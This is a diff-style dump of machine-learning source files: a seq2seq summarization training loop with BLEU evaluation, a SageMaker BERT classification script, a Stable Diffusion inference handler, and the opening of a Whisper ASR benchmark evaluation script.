+ accelerator.print('starting evaluation')
588
+ count_printed = 0
589
+
590
+ def postprocess_text(preds, labels):
591
+ preds = [pred.strip() for pred in preds]
592
+ labels = [[label.strip()] for label in labels]
593
+ return (preds, labels)
594
+ model.eval()
595
+ if args.val_max_target_length is None:
596
+ args.val_max_target_length = args.max_target_length
597
+ gen_kwargs = {'max_length': args.val_max_target_length if args is not None else max_length, 'num_beams': args.num_beams, 'min_length': args.val_min_target_length, 'length_penalty': False, 'no_repeat_ngram_size': 3, 'encoder_no_repeat_ngram_size': 3, 'repetition_penalty': 1.2}
598
+ samples_seen = 0
599
+ for (step, batch) in enumerate(eval_dataloader):
600
+ with torch.no_grad():
601
+ generated_tokens = accelerator.unwrap_model(model).generate(batch['input_ids'], attention_mask=batch['attention_mask'], **gen_kwargs)
602
+ generated_tokens = accelerator.pad_across_processes(generated_tokens, dim=1, pad_index=tokenizer.pad_token_id)
603
+ labels = batch['labels']
604
+ if not args.pad_to_max_length:
605
+ labels = accelerator.pad_across_processes(batch['labels'], dim=1, pad_index=tokenizer.pad_token_id)
606
+ (generated_tokens, labels) = accelerator.gather((generated_tokens, labels))
607
+ generated_tokens = generated_tokens.cpu().numpy()
608
+ labels = labels.cpu().numpy()
609
+ if args.ignore_pad_token_for_loss:
610
+ labels = np.where(labels != -100, labels, tokenizer.pad_token_id)
611
+ decoded_preds = tokenizer.batch_decode(generated_tokens, skip_special_tokens=True)
612
+ decoded_labels = tokenizer.batch_decode(labels, skip_special_tokens=True)
613
+ if count_printed < args.n_val_batch_generations:
614
+ logger.info('printing few sample generations and corresponding labels from eval set')
615
+ logger.info('prompt | generated | label')
616
+ decoded_prompts = tokenizer.batch_decode(batch['input_ids'], skip_special_tokens=False)
617
+ for (prompt, generated_response, response) in zip(decoded_prompts, decoded_preds, decoded_labels):
618
+ cleaned_prompt = prompt.replace('<pad>', '').strip()
619
+ logger.info(f'{cleaned_prompt} | {generated_response} | {response}')
620
+ count_printed += 1
621
+ (decoded_preds, decoded_labels) = postprocess_text(decoded_preds, decoded_labels)
622
+ if accelerator.num_processes > 1:
623
+ if step == len(eval_dataloader) - 1:
624
+ decoded_preds = decoded_preds[:len(eval_dataloader.dataset) - samples_seen]
625
+ decoded_labels = decoded_labels[:len(eval_dataloader.dataset) - samples_seen]
626
+ else:
627
+ samples_seen += len(decoded_labels)
628
+ metric.add_batch(predictions=decoded_preds, references=decoded_labels)
629
+ result = metric.compute()
630
+ logger.info({'bleu': result['score']})
631
+ accelerator.print('evaluation completed')
632
+ return result['score']
633
+
634
+ def load_training_checkpoint(model, load_dir, tag=None, **kwargs):
635
+ (_, checkpoint_state_dict) = model.load_checkpoint(load_dir, tag=tag, **kwargs)
636
+ epoch = checkpoint_state_dict['epoch']
637
+ last_global_step = checkpoint_state_dict['last_global_step']
638
+ del checkpoint_state_dict
639
+ return (epoch, last_global_step)
640
+
641
+ def main():
642
+ args = parse_args()
643
+ accelerator = Accelerator(log_with=args.report_to, logging_dir=args.output_dir) if args.with_tracking else Accelerator()
644
+ if args.source_prefix is None and args.model_name_or_path in ['t5-small', 't5-base', 't5-large', 't5-3b', 't5-11b']:
645
+ logger.warning("You're running a t5 model but didn't provide a source prefix, which is expected, e.g. with `--source_prefix 'summarize: '`")
646
+ logging.basicConfig(format='%(asctime)s - %(levelname)s - %(name)s - %(message)s', datefmt='%m/%d/%Y %H:%M:%S', level=logging.INFO)
647
+ logger.info(accelerator.state, main_process_only=False)
648
+ if accelerator.is_local_main_process:
649
+ datasets.utils.logging.set_verbosity_warning()
650
+ transformers.utils.logging.set_verbosity_info()
651
+ else:
652
+ datasets.utils.logging.set_verbosity_error()
653
+ transformers.utils.logging.set_verbosity_error()
654
+ if args.seed is not None:
655
+ set_seed(args.seed)
656
+ if accelerator.is_main_process:
657
+ if args.push_to_hub:
658
+ if args.hub_model_id is None:
659
+ repo_name = get_full_repo_name(Path(args.output_dir).name, token=args.hub_token)
660
+ else:
661
+ repo_name = args.hub_model_id
662
+ repo = Repository(args.output_dir, clone_from=repo_name)
663
+ with open(os.path.join(args.output_dir, '.gitignore'), 'w+') as gitignore:
664
+ if 'step_*' not in gitignore:
665
+ gitignore.write('step_*\n')
666
+ if 'epoch_*' not in gitignore:
667
+ gitignore.write('epoch_*\n')
668
+ elif args.output_dir is not None:
669
+ os.makedirs(args.output_dir, exist_ok=True)
670
+ accelerator.wait_for_everyone()
671
+ if args.dataset_name is not None:
672
+ raw_datasets = load_dataset(args.dataset_name, args.dataset_config_name)
673
+ if args.n_train > 0:
674
+ raw_datasets['train'] = datasets.Dataset.from_dict(raw_datasets['train'][:args.n_train])
675
+ if args.n_val > 0:
676
+ raw_datasets['validation'] = datasets.Dataset.from_dict(raw_datasets['validation'][:args.n_val])
677
+ else:
678
+ data_files = {}
679
+ if args.train_file is not None:
680
+ data_files['train'] = args.train_file
681
+ if args.validation_file is not None:
682
+ data_files['validation'] = args.validation_file
683
+ extension = args.train_file.split('.')[-1]
684
+ raw_datasets = load_dataset(extension, data_files=data_files)
685
+ if args.config_name:
686
+ config = AutoConfig.from_pretrained(args.config_name)
687
+ elif args.model_name_or_path:
688
+ config = AutoConfig.from_pretrained(args.model_name_or_path)
689
+ else:
690
+ config = CONFIG_MAPPING[args.model_type]()
691
+ logger.warning('You are instantiating a new config instance from scratch.')
692
+ if args.tokenizer_name:
693
+ tokenizer = AutoTokenizer.from_pretrained(args.tokenizer_name, use_fast=not args.use_slow_tokenizer)
694
+ elif args.model_name_or_path:
695
+ tokenizer = AutoTokenizer.from_pretrained(args.model_name_or_path, use_fast=not args.use_slow_tokenizer)
696
+ else:
697
+ raise ValueError('You are instantiating a new tokenizer from scratch. This is not supported by this script. You can do it from another script, save it, and load it from here, using --tokenizer_name.')
698
+ if args.model_name_or_path:
699
+ model = AutoModelForSeq2SeqLM.from_pretrained(args.model_name_or_path, from_tf=bool('.ckpt' in args.model_name_or_path), config=config)
700
+ else:
701
+ logger.info('Training new model from scratch')
702
+ model = AutoModelForSeq2SeqLM.from_config(config)
703
+ model.resize_token_embeddings(len(tokenizer))
704
+ if model.config.decoder_start_token_id is None:
705
+ raise ValueError('Make sure that `config.decoder_start_token_id` is correctly defined')
706
+ prefix = args.source_prefix if args.source_prefix is not None else ''
707
+ column_names = raw_datasets['train'].column_names
708
+ dataset_columns = column_names
709
+ if args.text_column is None:
710
+ text_column = dataset_columns[0] if dataset_columns is not None else column_names[0]
711
+ else:
712
+ text_column = args.text_column
713
+ if text_column not in column_names:
714
+ raise ValueError(f"--text_column' value '{args.text_column}' needs to be one of: {', '.join(column_names)}")
715
+ if args.summary_column is None:
716
+ summary_column = dataset_columns[1] if dataset_columns is not None else column_names[1]
717
+ else:
718
+ summary_column = args.summary_column
719
+ if summary_column not in column_names:
720
+ raise ValueError(f"--summary_column' value '{args.summary_column}' needs to be one of: {', '.join(column_names)}")
721
+ max_target_length = args.max_target_length
722
+ padding = 'max_length' if args.pad_to_max_length else False
723
+
724
+ def preprocess_function(examples):
725
+ inputs = examples[text_column]
726
+ targets = examples[summary_column]
727
+ inputs = [prefix + inp for inp in inputs]
728
+ model_inputs = tokenizer(inputs, max_length=args.max_source_length, padding=padding, truncation=True)
729
+ if 't5' in args.model_name_or_path:
730
+ with tokenizer.as_target_tokenizer():
731
+ labels = tokenizer(targets, max_length=max_target_length, padding=padding, truncation=True)
732
+ else:
733
+ labels = tokenizer(targets, max_length=max_target_length, padding=padding, truncation=True)
734
+ if padding == 'max_length' and args.ignore_pad_token_for_loss:
735
+ labels['input_ids'] = [[l if l != tokenizer.pad_token_id else -100 for l in label] for label in labels['input_ids']]
736
+ model_inputs['labels'] = labels['input_ids']
737
+ return model_inputs
738
+ with accelerator.main_process_first():
739
+ processed_datasets = raw_datasets.map(preprocess_function, batched=True, num_proc=args.preprocessing_num_workers, remove_columns=column_names, load_from_cache_file=not args.overwrite_cache, desc='Running tokenizer on dataset')
740
+ train_dataset = processed_datasets['train']
741
+ eval_dataset = processed_datasets['validation']
742
+ for index in random.sample(range(len(train_dataset)), 1):
743
+ logger.info(f'Sample {index} of the training set: {train_dataset[index]}.')
744
+ label_pad_token_id = -100 if args.ignore_pad_token_for_loss else tokenizer.pad_token_id
745
+ data_collator = DataCollatorForSeq2Seq(tokenizer, model=model, label_pad_token_id=label_pad_token_id, pad_to_multiple_of=8 if accelerator.use_fp16 else None)
746
+ train_dataloader = DataLoader(train_dataset, shuffle=True, collate_fn=data_collator, batch_size=args.per_device_train_batch_size)
747
+ eval_dataloader = DataLoader(eval_dataset, collate_fn=data_collator, batch_size=args.per_device_eval_batch_size)
748
+ no_decay = ['bias', 'LayerNorm.weight']
749
+ optimizer_grouped_parameters = [{'params': [p for (n, p) in model.named_parameters() if not any((nd in n for nd in no_decay))], 'weight_decay': args.weight_decay}, {'params': [p for (n, p) in model.named_parameters() if any((nd in n for nd in no_decay))], 'weight_decay': 0.0}]
750
+ optimizer_cls = torch.optim.Adam if accelerator.state.deepspeed_plugin is None or 'optimizer' not in accelerator.state.deepspeed_plugin.deepspeed_config else DummyOptim
751
+ optimizer = optimizer_cls(optimizer_grouped_parameters, lr=args.learning_rate)
752
+ if accelerator.state.deepspeed_plugin is not None:
753
+ args.gradient_accumulation_steps = accelerator.state.deepspeed_plugin.deepspeed_config['gradient_accumulation_steps']
754
+ num_update_steps_per_epoch = math.ceil(len(train_dataloader) / args.gradient_accumulation_steps)
755
+ if args.max_train_steps is None:
756
+ args.max_train_steps = args.num_train_epochs * num_update_steps_per_epoch
757
+ else:
758
+ args.num_train_epochs = math.ceil(args.max_train_steps / num_update_steps_per_epoch)
759
+ if accelerator.state.deepspeed_plugin is None or 'scheduler' not in accelerator.state.deepspeed_plugin.deepspeed_config:
760
+ lr_scheduler = get_scheduler(name=args.lr_scheduler_type, optimizer=optimizer, num_warmup_steps=args.num_warmup_steps, num_training_steps=args.max_train_steps)
761
+ else:
762
+ lr_scheduler = DummyScheduler(optimizer, total_num_steps=args.max_train_steps, warmup_num_steps=args.num_warmup_steps)
763
+ (model, optimizer, train_dataloader, eval_dataloader, lr_scheduler) = accelerator.prepare(model, optimizer, train_dataloader, eval_dataloader, lr_scheduler)
764
+ num_update_steps_per_epoch = math.ceil(len(train_dataloader) / args.gradient_accumulation_steps)
765
+ args.max_train_steps = args.num_train_epochs * num_update_steps_per_epoch
766
+ if hasattr(args.checkpointing_steps, 'isdigit'):
767
+ checkpointing_steps = args.checkpointing_steps
768
+ if args.checkpointing_steps.isdigit():
769
+ checkpointing_steps = int(args.checkpointing_steps)
770
+ else:
771
+ checkpointing_steps = None
772
+ if args.with_tracking:
773
+ if accelerator.is_main_process:
774
+ experiment_config = vars(args)
775
+ experiment_config['lr_scheduler_type'] = experiment_config['lr_scheduler_type'].value
776
+ accelerator.init_trackers(args.report_name, experiment_config)
777
+ metric = load_metric('sacrebleu')
778
+ total_batch_size = args.per_device_train_batch_size * accelerator.num_processes * args.gradient_accumulation_steps
779
+ logger.info('***** Running training *****')
780
+ logger.info(f' Num examples = {len(train_dataset)}')
781
+ logger.info(f' Num Epochs = {args.num_train_epochs}')
782
+ logger.info(f' Instantaneous batch size per device = {args.per_device_train_batch_size}')
783
+ logger.info(f' Total train batch size (w. parallel, distributed & accumulation) = {total_batch_size}')
784
+ logger.info(f' Gradient Accumulation steps = {args.gradient_accumulation_steps}')
785
+ logger.info(f' Total optimization steps = {args.max_train_steps}')
786
+ progress_bar = tqdm(range(args.max_train_steps), disable=not accelerator.is_local_main_process)
787
+ completed_steps = 0
788
+ starting_epoch = 0
789
+ best_metric = None
790
+ best_metric_checkpoint = None
791
+ if args.resume_from_checkpoint:
792
+ (_, last_global_step) = load_training_checkpoint(model, args.resume_from_checkpoint, **{'load_optimizer_states': True, 'load_lr_scheduler_states': True})
793
+ accelerator.print(f'Resumed from checkpoint: {args.resume_from_checkpoint}')
794
+ resume_step = last_global_step
795
+ starting_epoch = resume_step // len(train_dataloader)
796
+ resume_step -= starting_epoch * len(train_dataloader)
797
+ for epoch in range(starting_epoch, args.num_train_epochs):
798
+ start_time = time()
799
+ model.train()
800
+ if args.with_tracking:
801
+ total_loss = 0
802
+ for (step, batch) in enumerate(train_dataloader):
803
+ if args.resume_from_checkpoint and epoch == starting_epoch:
804
+ if resume_step is not None and step < resume_step:
805
+ completed_steps += 1
806
+ continue
807
+ decoder_input_ids = batch['labels'].new_zeros(batch['labels'].shape)
808
+ decoder_input_ids[..., 1:] = batch['labels'][..., :-1].clone()
809
+ decoder_input_ids[..., 0] = 0
810
+ decoder_input_ids.masked_fill_(decoder_input_ids == -100, 0)
811
+ batch['decoder_input_ids'] = decoder_input_ids
812
+ outputs = model(**batch)
813
+ loss = outputs.loss
814
+ if args.with_tracking:
815
+ total_loss += loss.detach().float()
816
+ loss = loss / args.gradient_accumulation_steps
817
+ accelerator.backward(loss)
818
+ if step % args.gradient_accumulation_steps == 0 or step == len(train_dataloader) - 1:
819
+ optimizer.step()
820
+ lr_scheduler.step()
821
+ optimizer.zero_grad()
822
+ progress_bar.update(1)
823
+ completed_steps += 1
824
+ if isinstance(args.logging_steps, int):
825
+ if completed_steps % args.logging_steps == 0:
826
+ steps_this_epoch = completed_steps % len(train_dataloader)
827
+ train_loss = total_loss.item() / steps_this_epoch
828
+ train_perplexity = math.exp(train_loss)
829
+ accelerator.log({'train_loss': train_loss, 'train_perplexity': train_perplexity, 'epoch': epoch, 'step': completed_steps, 'steps_this_epoch': steps_this_epoch}, step=completed_steps)
830
+ logger.info(f'Epoch: {epoch}, Step: {completed_steps}, Loss: {train_loss}, Perplexity: {train_perplexity}')
831
+ if isinstance(checkpointing_steps, int):
832
+ if completed_steps % checkpointing_steps == 0:
833
+ if accelerator.state.deepspeed_plugin is not None:
834
+ checkpoint_model(args.output_dir, epoch, model, epoch, completed_steps)
835
+ else:
836
+ accelerator.wait_for_everyone()
837
+ if accelerator.is_main_process:
838
+ ckpt_path = os.path.join(args.output_dir, str(epoch))
839
+ os.makedirs(ckpt_path, exist_ok=True)
840
+ accelerator.save(accelerator.get_state_dict(model), os.path.join(ckpt_path, 'model.pt'))
841
+ if completed_steps >= args.max_train_steps:
842
+ break
843
+ end_time = time()
844
+ logger.info(f'Epoch {epoch} training took {end_time - start_time} seconds')
845
+ if accelerator.state.deepspeed_plugin is not None:
846
+ checkpoint_model(args.output_dir, epoch, model, epoch, completed_steps)
847
+ else:
848
+ accelerator.wait_for_everyone()
849
+ if accelerator.is_main_process:
850
+ ckpt_path = os.path.join(args.output_dir, str(epoch))
851
+ os.makedirs(ckpt_path, exist_ok=True)
852
+ accelerator.save(accelerator.get_state_dict(model), os.path.join(ckpt_path, 'model.pt'))
853
+ start_time = time()
854
+ bleu_score = evaluate(args, model, metric, tokenizer, eval_dataloader, accelerator, config.max_length)
855
+ end_time = time()
856
+ logger.info(f'Epoch {epoch} evaluation took {end_time - start_time} seconds')
857
+ result = {}
858
+ if args.with_tracking:
859
+ result['bleu_score'] = bleu_score
860
+ result['train_loss'] = total_loss.item() / len(train_dataloader)
861
+ result['train_perplexity'] = math.exp(result['train_loss'])
862
+ result['epoch'] = epoch
863
+ result['step'] = completed_steps
864
+ accelerator.log(result, step=completed_steps)
865
+ if (best_metric is None or best_metric < bleu_score) and args.load_best_model:
866
+ best_metric = bleu_score
867
+ best_metric_checkpoint = os.path.join(args.output_dir, str(epoch))
868
+ accelerator.print(f'New best metric: {best_metric} at epoch {epoch}')
869
+ accelerator.print(f'best_metric_checkpoint: {best_metric_checkpoint}')
870
+ if args.load_best_model:
871
+ if accelerator.state.deepspeed_plugin is not None:
872
+ (_, last_global_step) = load_training_checkpoint(model, '/'.join(best_metric_checkpoint.split('/')[:-1]), tag=best_metric_checkpoint.split('/')[-1], **{'load_optimizer_states': True, 'load_lr_scheduler_states': True})
873
+ else:
874
+ map_location = {'cuda:0': 'cuda:{}'.format(accelerator.local_process_index)}
875
+ model.load_state_dict(torch.load(os.path.join(best_metric_checkpoint, 'model.pt'), map_location=map_location))
876
+ bleu_score = evaluate(args, model, metric, tokenizer, eval_dataloader, accelerator, config.max_length)
877
+ logger.info(f'Best model metrics: bleu_score: {bleu_score}')
878
+ if bleu_score != best_metric:
879
+ raise AssertionError(f'Best metric {best_metric} does not match the metric {bleu_score} of the loaded best model.')
880
+ if args.output_dir is not None:
881
+ accelerator.wait_for_everyone()
882
+ unwrapped_model = accelerator.unwrap_model(model)
883
+ unwrapped_model.save_pretrained(args.output_dir, is_main_process=accelerator.is_main_process, save_function=accelerator.save, state_dict=accelerator.get_state_dict(model))
884
+ if accelerator.is_main_process:
885
+ tokenizer.save_pretrained(args.output_dir)
886
+ if args.push_to_hub:
887
+ repo.push_to_hub(commit_message='End of training', auto_lfs_prune=True)
888
+ with open(os.path.join(args.output_dir, 'all_results.json'), 'w') as f:
889
+ json.dump({'eval_bleu': bleu_score}, f)
890
+ if __name__ == '__main__':
891
+ main()
892
+
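The training loop above builds `decoder_input_ids` by right-shifting the labels and masking the -100 padding positions. A tiny standalone sketch of that transformation, with invented values, makes the shift easier to see:

# Right-shift labels into decoder inputs, as done inside the training loop above.
import torch

labels = torch.tensor([[42, 17, 9, -100, -100]])          # -100 marks ignored/padded label positions
decoder_input_ids = labels.new_zeros(labels.shape)
decoder_input_ids[..., 1:] = labels[..., :-1].clone()
decoder_input_ids[..., 0] = 0                              # decoder_start_token_id assumed to be 0 here
decoder_input_ids.masked_fill_(decoder_input_ids == -100, 0)
print(decoder_input_ids)                                    # tensor([[ 0, 42, 17,  9,  0]])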
893
+ # File: notebooks-main/sagemaker/22_accelerate_sagemaker_examples/src/text-classification/train_using_s3_data.py
894
+ import argparse
895
+ import os
896
+ import torch
897
+ from torch.optim import AdamW
898
+ from torch.utils.data import DataLoader
899
+ import evaluate
900
+ from accelerate import Accelerator, DistributedType
901
+ from datasets import load_from_disk
902
+ from transformers import AutoModelForSequenceClassification, AutoTokenizer, get_linear_schedule_with_warmup, set_seed
903
+ MAX_GPU_BATCH_SIZE = 16
904
+ EVAL_BATCH_SIZE = 32
905
+
906
+ def training_function(config, args):
907
+ if args.with_tracking:
908
+ accelerator = Accelerator(cpu=args.cpu, mixed_precision=args.mixed_precision, log_with='all', logging_dir=args.logging_dir)
909
+ else:
910
+ accelerator = Accelerator(cpu=args.cpu, mixed_precision=args.mixed_precision)
911
+ if hasattr(args.checkpointing_steps, 'isdigit'):
912
+ if args.checkpointing_steps == 'epoch':
913
+ checkpointing_steps = args.checkpointing_steps
914
+ elif args.checkpointing_steps.isdigit():
915
+ checkpointing_steps = int(args.checkpointing_steps)
916
+ else:
917
+ raise ValueError(f'Argument `checkpointing_steps` must be either a number or `epoch`. `{args.checkpointing_steps}` passed.')
918
+ else:
919
+ checkpointing_steps = None
920
+ lr = config['lr']
921
+ num_epochs = int(config['num_epochs'])
922
+ seed = int(config['seed'])
923
+ batch_size = int(config['batch_size'])
924
+ if args.with_tracking:
925
+ run = os.path.split(__file__)[-1].split('.')[0]
926
+ accelerator.init_trackers(run, config)
927
+ tokenizer = AutoTokenizer.from_pretrained('bert-base-cased')
928
+ metric = evaluate.load('glue', 'mrpc')
929
+ gradient_accumulation_steps = 1
930
+ if batch_size > MAX_GPU_BATCH_SIZE and accelerator.distributed_type != DistributedType.TPU:
931
+ gradient_accumulation_steps = batch_size // MAX_GPU_BATCH_SIZE
932
+ batch_size = MAX_GPU_BATCH_SIZE
933
+
934
+ def collate_fn(examples):
935
+ if accelerator.distributed_type == DistributedType.TPU:
936
+ return tokenizer.pad(examples, padding='max_length', max_length=128, return_tensors='pt')
937
+ return tokenizer.pad(examples, padding='longest', return_tensors='pt')
938
+ train_dataset = load_from_disk(args.training_dir)
939
+ validation_dataset = load_from_disk(args.validation_dir)
940
+ accelerator.print(f' loaded train_dataset length is: {len(train_dataset)}')
941
+ accelerator.print(f' loaded test_dataset length is: {len(validation_dataset)}')
942
+ train_dataloader = DataLoader(train_dataset, shuffle=True, collate_fn=collate_fn, batch_size=batch_size)
943
+ eval_dataloader = DataLoader(validation_dataset, shuffle=False, collate_fn=collate_fn, batch_size=EVAL_BATCH_SIZE)
944
+ set_seed(seed)
945
+ model = AutoModelForSequenceClassification.from_pretrained('bert-base-cased', return_dict=True)
946
+ model = model.to(accelerator.device)
947
+ optimizer = AdamW(params=model.parameters(), lr=lr)
948
+ lr_scheduler = get_linear_schedule_with_warmup(optimizer=optimizer, num_warmup_steps=100, num_training_steps=len(train_dataloader) * num_epochs // gradient_accumulation_steps)
949
+ (model, optimizer, train_dataloader, eval_dataloader, lr_scheduler) = accelerator.prepare(model, optimizer, train_dataloader, eval_dataloader, lr_scheduler)
950
+ overall_step = 0
951
+ starting_epoch = 0
952
+ if args.resume_from_checkpoint:
953
+ if args.resume_from_checkpoint is not None or args.resume_from_checkpoint != '':
954
+ accelerator.print(f'Resumed from checkpoint: {args.resume_from_checkpoint}')
955
+ accelerator.load_state(args.resume_from_checkpoint)
956
+ path = os.path.basename(args.resume_from_checkpoint)
957
+ else:
958
+ dirs = [f.name for f in os.scandir(os.getcwd()) if f.is_dir()]
959
+ dirs.sort(key=os.path.getctime)
960
+ path = dirs[-1]
961
+ training_difference = os.path.splitext(path)[0]
962
+ if 'epoch' in training_difference:
963
+ starting_epoch = int(training_difference.replace('epoch_', '')) + 1
964
+ resume_step = None
965
+ else:
966
+ resume_step = int(training_difference.replace('step_', ''))
967
+ starting_epoch = resume_step // len(train_dataloader)
968
+ resume_step -= starting_epoch * len(train_dataloader)
969
+ for epoch in range(starting_epoch, num_epochs):
970
+ model.train()
971
+ if args.with_tracking:
972
+ total_loss = 0
973
+ for (step, batch) in enumerate(train_dataloader):
974
+ if args.resume_from_checkpoint and epoch == starting_epoch:
975
+ if resume_step is not None and step < resume_step:
976
+ overall_step += 1
977
+ continue
978
+ batch.to(accelerator.device)
979
+ outputs = model(**batch)
980
+ loss = outputs.loss
981
+ loss = loss / gradient_accumulation_steps
982
+ if args.with_tracking:
983
+ total_loss += loss.detach().float()
984
+ accelerator.backward(loss)
985
+ if step % gradient_accumulation_steps == 0:
986
+ optimizer.step()
987
+ lr_scheduler.step()
988
+ optimizer.zero_grad()
989
+ overall_step += 1
990
+ if isinstance(checkpointing_steps, int):
991
+ output_dir = f'step_{overall_step}'
992
+ if overall_step % checkpointing_steps == 0:
993
+ if args.output_dir is not None:
994
+ output_dir = os.path.join(args.output_dir, output_dir)
995
+ accelerator.save_state(output_dir)
996
+ model.eval()
997
+ for (step, batch) in enumerate(eval_dataloader):
998
+ batch.to(accelerator.device)
999
+ with torch.no_grad():
1000
+ outputs = model(**batch)
1001
+ predictions = outputs.logits.argmax(dim=-1)
1002
+ (predictions, references) = accelerator.gather_for_metrics((predictions, batch['labels']))
1003
+ metric.add_batch(predictions=predictions, references=references)
1004
+ eval_metric = metric.compute()
1005
+ accelerator.print(f'epoch {epoch}:', eval_metric)
1006
+ if args.with_tracking:
1007
+ accelerator.log({'accuracy': eval_metric['accuracy'], 'f1': eval_metric['f1'], 'train_loss': total_loss.item() / len(train_dataloader), 'epoch': epoch}, step=epoch)
1008
+ if checkpointing_steps == 'epoch':
1009
+ output_dir = f'epoch_{epoch}'
1010
+ if args.output_dir is not None:
1011
+ output_dir = os.path.join(args.output_dir, output_dir)
1012
+ accelerator.save_state(output_dir)
1013
+ accelerator.save(accelerator.get_state_dict(model), os.path.join(args.output_dir, 'model.pt'))
1014
+ if args.with_tracking:
1015
+ accelerator.end_training()
1016
+
1017
+ def main():
1018
+ parser = argparse.ArgumentParser(description='Simple example of training script.')
1019
+ parser.add_argument('--mixed_precision', type=str, default='no', choices=['no', 'fp16', 'bf16'], help='Whether to use mixed precision. Choose between fp16 and bf16 (bfloat16). Bf16 requires PyTorch >= 1.10 and an Nvidia Ampere GPU.')
1020
+ parser.add_argument('--cpu', action='store_true', help='If passed, will train on the CPU.')
1021
+ parser.add_argument('--checkpointing_steps', type=str, default=None, help="Whether the various states should be saved at the end of every n steps, or 'epoch' for each epoch.")
1022
+ parser.add_argument('--resume_from_checkpoint', type=str, default=None, help='If the training should continue from a checkpoint folder.')
1023
+ parser.add_argument('--with_tracking', action='store_true', help='Whether to load in all available experiment trackers from the environment and use them for logging.')
1024
+ parser.add_argument('--logging_dir', type=str, default=os.path.join(os.environ['SM_OUTPUT_DATA_DIR'], 'logs'), help='Where to store experiment tracking logs.')
1025
+ parser.add_argument('--output_dir', type=str, default=os.environ['SM_MODEL_DIR'])
1026
+ parser.add_argument('--training_dir', type=str, default=os.environ['SM_CHANNEL_TRAIN'])
1027
+ parser.add_argument('--validation_dir', type=str, default=os.environ['SM_CHANNEL_VALIDATION'])
1028
+ args = parser.parse_args()
1029
+ config = {'lr': 2e-05, 'num_epochs': 3, 'seed': 42, 'batch_size': 16}
1030
+ training_function(config, args)
1031
+ if __name__ == '__main__':
1032
+ main()
1033
+
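This script resolves its data and output locations from SageMaker's standard environment variables at argument-parsing time, so running it outside a training job requires those variables to exist first. A minimal stand-in is sketched below; the paths are placeholders, and the train/validation directories must contain datasets written with `datasets.Dataset.save_to_disk`, since the script reads them back with `load_from_disk`.

# Hypothetical local stand-ins for the channels SageMaker would normally mount.
import os

os.environ.setdefault('SM_OUTPUT_DATA_DIR', '/tmp/sm/output')
os.environ.setdefault('SM_MODEL_DIR', '/tmp/sm/model')
os.environ.setdefault('SM_CHANNEL_TRAIN', '/tmp/sm/data/train')            # save_to_disk() output expected here
os.environ.setdefault('SM_CHANNEL_VALIDATION', '/tmp/sm/data/validation')  # and here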
1034
+ # File: notebooks-main/sagemaker/23_stable_diffusion_inference/code/inference.py
1035
+ import base64
1036
+ import torch
1037
+ from io import BytesIO
1038
+ from diffusers import StableDiffusionPipeline
1039
+
1040
+ def model_fn(model_dir):
1041
+ pipe = StableDiffusionPipeline.from_pretrained(model_dir, torch_dtype=torch.float16)
1042
+ pipe = pipe.to('cuda')
1043
+ return pipe
1044
+
1045
+ def predict_fn(data, pipe):
1046
+ prompt = data.pop('inputs', data)
1047
+ num_inference_steps = data.pop('num_inference_steps', 50)
1048
+ guidance_scale = data.pop('guidance_scale', 7.5)
1049
+ num_images_per_prompt = data.pop('num_images_per_prompt', 4)
1050
+ generated_images = pipe(prompt, num_inference_steps=num_inference_steps, guidance_scale=guidance_scale, num_images_per_prompt=num_images_per_prompt)['images']
1051
+ encoded_images = []
1052
+ for image in generated_images:
1053
+ buffered = BytesIO()
1054
+ image.save(buffered, format='JPEG')
1055
+ encoded_images.append(base64.b64encode(buffered.getvalue()).decode())
1056
+ return {'generated_images': encoded_images}
1057
+
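On the client side, the JPEGs returned by this handler arrive base64-encoded; decoding them back into PIL images is a one-liner per image. In the sketch below, `response` stands in for the dictionary produced by `predict_fn` (or returned by the deployed endpoint).

# Decode the base64-encoded JPEGs returned by the Stable Diffusion handler above.
import base64
from io import BytesIO
from PIL import Image

response = {'generated_images': []}  # placeholder for the dict returned by predict_fn
images = [Image.open(BytesIO(base64.b64decode(img))) for img in response['generated_images']]
for i, image in enumerate(images):
    image.save(f'generated_{i}.jpg')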
huggingface_open-muse.txt ADDED
The diff for this file is too large to render. See raw diff
 
huggingface_open_asr_leaderboard.txt ADDED
@@ -0,0 +1,882 @@
1
+ # File: open_asr_leaderboard-main/ctranslate2/run_eval.py
2
+ """"""
3
+ import argparse
4
+ import os
5
+ import time
6
+ import evaluate
7
+ from faster_whisper import WhisperModel
8
+ from tqdm import tqdm
9
+ from normalizer import data_utils
10
+ wer_metric = evaluate.load('wer')
11
+
12
+ def main(args) -> None:
13
+ asr_model = WhisperModel(model_size_or_path=args.model_id, compute_type='float16', device='cuda', device_index=args.device)
14
+
15
+ def benchmark(batch):
16
+ start_time = time.time()
17
+ (segments, _) = asr_model.transcribe(batch['audio']['array'], language='en')
18
+ outputs = [segment._asdict() for segment in segments]
19
+ batch['transcription_time_s'] = time.time() - start_time
20
+ batch['predictions'] = data_utils.normalizer(''.join([segment['text'] for segment in outputs])).strip()
21
+ batch['references'] = batch['norm_text']
22
+ return batch
23
+ if args.warmup_steps is not None:
24
+ dataset = data_utils.load_data(args)
25
+ dataset = data_utils.prepare_data(dataset)
26
+ if args.streaming:
27
+ warmup_dataset = dataset.take(args.warmup_steps)
28
+ else:
29
+ warmup_dataset = dataset.select(range(min(args.warmup_steps, len(dataset))))
30
+ warmup_dataset = iter(warmup_dataset.map(benchmark, remove_columns=['audio']))
31
+ for _ in tqdm(warmup_dataset, desc='Warming up...'):
32
+ continue
33
+ dataset = data_utils.load_data(args)
34
+ if args.max_eval_samples is not None and args.max_eval_samples > 0:
35
+ print(f'Subsampling dataset to first {args.max_eval_samples} samples!')
36
+ if args.streaming:
37
+ dataset = dataset.take(args.max_eval_samples)
38
+ else:
39
+ dataset = dataset.select(range(min(args.max_eval_samples, len(dataset))))
40
+ dataset = data_utils.prepare_data(dataset)
41
+ dataset = dataset.map(benchmark, remove_columns=['audio'])
42
+ all_results = {'audio_length_s': [], 'transcription_time_s': [], 'predictions': [], 'references': []}
43
+ result_iter = iter(dataset)
44
+ for result in tqdm(result_iter, desc='Samples...'):
45
+ for key in all_results:
46
+ all_results[key].append(result[key])
47
+ manifest_path = data_utils.write_manifest(all_results['references'], all_results['predictions'], args.model_id, args.dataset_path, args.dataset, args.split, audio_length=all_results['audio_length_s'], transcription_time=all_results['transcription_time_s'])
48
+ print('Results saved at path:', os.path.abspath(manifest_path))
49
+ wer = wer_metric.compute(references=all_results['references'], predictions=all_results['predictions'])
50
+ wer = round(100 * wer, 2)
51
+ rtfx = round(sum(all_results['audio_length_s']) / sum(all_results['transcription_time_s']), 2)
52
+ print('WER:', wer, '%', 'RTFx:', rtfx)
53
+ if __name__ == '__main__':
54
